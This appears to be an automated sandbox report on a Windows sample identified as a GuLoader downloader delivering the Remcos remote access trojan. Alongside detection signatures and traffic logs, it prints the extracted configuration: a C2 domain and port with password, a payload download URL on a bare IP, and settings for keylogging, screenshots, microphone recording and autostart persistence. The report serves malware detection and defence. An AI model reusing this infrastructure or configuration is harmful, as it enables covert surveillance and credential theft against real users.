
Windows Analysis Report g4FtSOZMD9

Overview

General Information

Sample Name: g4FtSOZMD9 (renamed file extension from none to exe)
Analysis ID: 547022
MD5: 81f377eda4163da1b74cae83e38ced9f
SHA1: e50abaf01a9fd3ae8176b5b6117f6b8f8a355ec0
SHA256: a16d035ca37dbd7ab34c856f4cdf96a9898dcebba08c5801c99f3d3100ae6b3f
Tags: 32, exe, trojan

Detection

GuLoader Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Remcos RAT
Detected unpacking (changes PE section rights)
GuLoader behavior detected
Sigma detected: Suspect Svchost Activity
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Hides threads from debuggers
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Tries to detect Any.run
Connects to many ports of the same IP (likely port scanning)
Yara detected VB6 Downloader Generic
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to steal Mail credentials (via file registry)
Injects a PE file into a foreign processes
Creates autostart registry keys with suspicious values (likely registry only malware)
Yara detected WebBrowserPassView password recovery tool
Sigma detected: Suspicious Svchost Process
C2 URLs / IPs found in malware configuration
Tries to steal Instant Messenger accounts or passwords
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • g4FtSOZMD9.exe (PID: 7068 cmdline: "C:\Users\user\Desktop\g4FtSOZMD9.exe" MD5: 81F377EDA4163DA1B74CAE83E38CED9F)
    • g4FtSOZMD9.exe (PID: 5452 cmdline: "C:\Users\user\Desktop\g4FtSOZMD9.exe" MD5: 81F377EDA4163DA1B74CAE83E38CED9F)
      • svchost.exe (PID: 2948 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • g4FtSOZMD9.exe (PID: 5524 cmdline: C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\iwxzjjveuvjtvtlo" MD5: 81F377EDA4163DA1B74CAE83E38CED9F)
      • g4FtSOZMD9.exe (PID: 3920 cmdline: C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\srdskbfyidbgfzzawoj" MD5: 81F377EDA4163DA1B74CAE83E38CED9F)
      • g4FtSOZMD9.exe (PID: 5972 cmdline: C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\vtilcuqzwmtlifvenyefmr" MD5: 81F377EDA4163DA1B74CAE83E38CED9F)
  • cleanup

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "nhtaxfilling.ddnsgeek.com:62758:1", "Assigned name": "1040", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "Clock.exe", "Startup value": "Clock", "Hide file": "Enable", "Mutex": "Remcos-UGB110", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Enable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Enable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Clock", "Keylog folder": "Clock", "Keylog file max size": "100000"}

Threatname: GuLoader

{"Payload URL": "http://147.189.137.168/1040_RyQoPlW98.bin"}

Yara Overview

Memory Dumps

Columns: Source; Rule; Description; Author; Strings
Source: 00000009.00000002.620873156.0000000001C23000.00000004.00000020.sdmp; Rule: JoeSecurity_Remcos; Description: Yara detected Remcos RAT; Author: Joe Security
Source: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp; Rule: JoeSecurity_GuLoader_2; Description: Yara detected GuLoader; Author: Joe Security
Source: 00000009.00000003.582459498.0000000001C39000.00000004.00000001.sdmp; Rule: LokiBot_Dropper_Packed_R11_Feb18; Description: Auto-generated rule - file scan copy.pdf.r11; Author: Florian Roth
  • Strings: 0xfc74:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Source: 00000009.00000000.462063926.00000000017A0000.00000040.00000001.sdmp; Rule: JoeSecurity_GuLoader_2; Description: Yara detected GuLoader; Author: Joe Security
Source: Process Memory Space: g4FtSOZMD9.exe PID: 7068; Rule: JoeSecurity_VB6DownloaderGeneric; Description: Yara detected VB6 Downloader Generic; Author: Joe Security

Sigma Overview

System Summary:

Sigma detected: Suspect Svchost Activity
Source: Process started; Author: David Burkett; Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\g4FtSOZMD9.exe" , ParentImage: C:\Users\user\Desktop\g4FtSOZMD9.exe, ParentProcessId: 5452, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 2948
Sigma detected: Suspicious Svchost Process
Source: Process started; Author: Florian Roth; Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\g4FtSOZMD9.exe" , ParentImage: C:\Users\user\Desktop\g4FtSOZMD9.exe, ParentProcessId: 5452, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 2948
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process started; Author: vburov; Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\g4FtSOZMD9.exe" , ParentImage: C:\Users\user\Desktop\g4FtSOZMD9.exe, ParentProcessId: 5452, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 2948

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000009.00000002.620873156.0000000001C23000.00000004.00000020.sdmp; Malware Configuration Extractor: Remcos {"Host:Port:Password": "nhtaxfilling.ddnsgeek.com:62758:1", "Assigned name": "1040", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "Clock.exe", "Startup value": "Clock", "Hide file": "Enable", "Mutex": "Remcos-UGB110", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Enable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Enable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Clock", "Keylog folder": "Clock", "Keylog file max size": "100000"}
Source: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp; Malware Configuration Extractor: GuLoader {"Payload URL": "http://147.189.137.168/1040_RyQoPlW98.bin"}
Multi AV Scanner detection for submitted file
Source: g4FtSOZMD9.exe; Virustotal: Detection: 22%
Yara detected Remcos RAT
Source: Yara match; File source: 00000009.00000002.620873156.0000000001C23000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: g4FtSOZMD9.exe PID: 5452, type: MEMORYSTR
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Brevsamlingssteds8\Restroke.exe; ReversingLabs: Detection: 16%
Source: 9.0.g4FtSOZMD9.exe.400000.2.unpack; Avira: Label: TR/Dropper.VB.Gen
Source: 0.0.g4FtSOZMD9.exe.400000.0.unpack; Avira: Label: TR/Dropper.VB.Gen
Source: 21.0.g4FtSOZMD9.exe.400000.0.unpack; Avira: Label: TR/Dropper.VB.Gen
Source: 9.0.g4FtSOZMD9.exe.400000.3.unpack; Avira: Label: TR/Dropper.VB.Gen
Source: 22.0.g4FtSOZMD9.exe.400000.0.unpack; Avira: Label: TR/Dropper.VB.Gen
Source: 9.0.g4FtSOZMD9.exe.400000.0.unpack; Avira: Label: TR/Dropper.VB.Gen
Source: 0.2.g4FtSOZMD9.exe.400000.0.unpack; Avira: Label: TR/Dropper.VB.Gen
Source: 9.0.g4FtSOZMD9.exe.400000.1.unpack; Avira: Label: TR/Dropper.VB.Gen
Source: 23.0.g4FtSOZMD9.exe.400000.0.unpack; Avira: Label: TR/Dropper.VB.Gen
Source: g4FtSOZMD9.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe; Code function: 22_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe; Code function: 23_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,

          Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.6:49835 -> 147.189.137.168:80
Connects to many ports of the same IP (likely port scanning)
Source: global traffic; TCP traffic: 207.32.218.236 ports 62758,2,5,6,7,8
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: nhtaxfilling.ddnsgeek.com
Source: Malware configuration extractor; URLs: http://147.189.137.168/1040_RyQoPlW98.bin
Source: Joe Sandbox View; ASN Name: JANETJiscServicesLimitedGB
Source: Joe Sandbox View; ASN Name: 1GSERVERSUS
Source: global traffic; HTTP traffic detected: GET /1040_RyQoPlW98.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: 147.189.137.168 | Cache-Control: no-cache
Source: global traffic; TCP traffic: 192.168.2.6:49836 -> 207.32.218.236:62758
Source: unknown; TCP traffic detected without corresponding DNS query: 147.189.137.168
Source: g4FtSOZMD9.exe, 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp; String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: g4FtSOZMD9.exe, g4FtSOZMD9.exe, 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp; String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: g4FtSOZMD9.exe; String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: g4FtSOZMD9.exe, 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp; String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: g4FtSOZMD9.exe, 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp; String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: g4FtSOZMD9.exe, 00000009.00000002.620742317.0000000001AB0000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000002.620803230.0000000001BD7000.00000004.00000020.sdmp; String found in binary or memory: http://147.189.137.168/1040_RyQoPlW98.bin
Source: g4FtSOZMD9.exe, 00000009.00000002.620803230.0000000001BD7000.00000004.00000020.sdmp; String found in binary or memory: http://147.189.137.168/1040_RyQoPlW98.bin~:
Source: g4FtSOZMD9.exe, 00000009.00000003.577311939.0000000020E52000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000002.624858543.0000000020E50000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.596412607.0000000020E50000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.577281474.0000000020E41000.00000004.00000001.sdmp; String found in binary or memory: http://ns.adobe.c/g?
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://ocsp.digicert.com0
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://ocsp.digicert.com0:
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://ocsp.digicert.com0B
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://ocsp.digicert.com0E
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://ocsp.digicert.com0F
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://ocsp.digicert.com0K
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://ocsp.digicert.com0M
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://ocsp.digicert.com0R
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://ocsp.msocsp.com0
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://ocsp.pki.goog/gsr202
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0#
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0M
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/2366737e/webcore/externalscripts/oneTrust/ski
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/5445db85/webcore/externalscripts/oneTrust/de-
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/3bf20fde-50425371/directi
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/f60532dd-3aac3bb8/directi
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-2923b6c2/directio
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-b532f4eb/directio
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/81/58b810.gif
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/86/2042ed.woff
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA61Ofl.img?h=16&w=16&m
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA7XCQ3.img?h=16&w=16&m
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AABzUSt.img?h=368&w=622
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADsAOZ.img?h=333&w=311
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADsZuW.img?h=166&w=310
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTp7.img?h=333&w=311
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuZko.img?h=75&w=100&
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv4Ge.img?h=75&w=100&
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv842.img?h=250&w=300
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv9IZ.img?h=75&w=100&
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbPR.img?h=250&w=300
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbce.img?h=166&w=310
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvhNP.img?h=166&w=310
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvhax.img?h=166&w=310
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvqEs.img?h=166&w=310
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvuGs.img?h=333&w=311
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvzqT.img?h=166&w=310
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17milU.img?h=16&w=16&
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=333&w=31
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xDME.img?h=75&w=100
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=166&w=31
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xMWp.img?h=75&w=100
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xssM.img?h=75&w=100
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xzm6.img?h=250&w=30
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yFoT.img?h=75&w=100
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yG8H.img?h=166&w=31
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yKf2.img?h=75&w=100
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19ylKx.img?h=75&w=100
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1kc8s.img?m=6&o=true&
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB6Ma4a.img?h=16&w=16&m
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hjL.img?h=16&w=16&m=
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBMQmHU.img?h=16&w=16&m
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBMVUFn.img?h=16&w=16&m
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBRUB0d.img?h=16&w=16&m
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBS0Ogx.img?h=75&w=100&
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuaWG.img?h=16&w=16&m
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBWoHwx.img?h=27&w=27&m
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBkwUr.img?h=16&w=16&m=
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BByBEMv.img?h=16&w=16&m
          Source: g4FtSOZMD9.exe, g4FtSOZMD9.exe, 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ebuddy.com
          Source: g4FtSOZMD9.exe, g4FtSOZMD9.exe, 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.imvu.com
          Source: g4FtSOZMD9.exe, 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
          Source: g4FtSOZMD9.exe, 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.imvu.comr
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://www.msn.com
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://www.msn.com/
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804
          Source: bhvFAB7.tmp.21.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
          Source: g4FtSOZMD9.exe, 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gt
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
